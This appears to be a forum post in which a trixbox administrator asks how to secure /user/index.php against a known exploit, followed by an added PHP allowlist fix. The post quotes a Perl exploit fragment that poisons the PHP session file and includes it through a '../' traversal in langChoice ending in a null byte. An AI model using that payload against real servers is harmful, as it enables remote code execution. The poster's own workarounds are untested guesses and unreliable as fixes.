
trixbox problem


adv


Hello, I have trixbox installed and recently I found out that there is an exploit with connect-back that lets you get access to the server.

The problem is in /user/index.php.

I found the exploit and it's made in Perl:

usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);

menu();

sub execScript{
    my $scriptCode = shift;
    post($scriptCode);
    my $phpsessionid = extractPHPSID($cookie_jar->as_string);
    post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}

It's getting access to /tmp. I've tried to chmod 755 /tmp, but then the index doesn't work; it gives an error.

<?php

apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"]))));
apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"]))));
ini_set("error_reporting","E_ALL & ~E_NOTICE");
//session_start();
require 'includes/smartysetup.php';
require_once("includes/xajax.inc.php");
include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version
$smarty->assign("tbversion",tbversion());
$smarty->assign("title","trixbox - User Mode");
...
?>

I've tried commenting out session_start(); it works, but does it cause any problems?

How do I secure it to keep hackers out?
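
The posted exploit sends a `../` path ending in `%00` in `langChoice` so that the session file under /tmp gets included. One way to close that path is to accept only known language names; this is an added example, not trixbox code and not part of the original post. `LANG_DIR`, the `<name>.php` file layout, `DEFAULT_LANG` and `resolveLanguageFile()` are assumptions, and the syntax is PHP 8.

```php
<?php
// Added example: allowlist validation for a language selector such as langChoice.
// LANG_DIR, DEFAULT_LANG, the <name>.php layout and resolveLanguageFile() are hypothetical.
const LANG_DIR = __DIR__ . '/language';
const DEFAULT_LANG = 'english';

function resolveLanguageFile(mixed $choice, string $langDir = LANG_DIR): string
{
    $default = $langDir . '/' . DEFAULT_LANG . '.php';

    // Only a short lowercase token passes: arrays, NUL bytes, slashes and dots are rejected.
    if (!is_string($choice) || !preg_match('/\A[a-z]{2,20}\z/', $choice)) {
        return $default;
    }

    // Compare against the language files that actually exist instead of trusting the input.
    $allowed = array_map(
        static fn(string $p): string => basename($p, '.php'),
        glob($langDir . '/*.php') ?: []
    );
    if (!in_array($choice, $allowed, true)) {
        return $default;
    }

    // Defence in depth: the resolved path must still sit inside the language directory.
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $choice . '.php');
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return $default;
    }
    return $path;
}

// Keep only the validated token in the session, never the raw POST value.
session_start();
$file = resolveLanguageFile($_POST['langChoice'] ?? $_SESSION['lang'] ?? DEFAULT_LANG);
$_SESSION['lang'] = basename($file, '.php');
require $file;
```

With this check a value such as the traversal string in the exploit fails the pattern test and the default language file is loaded instead.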
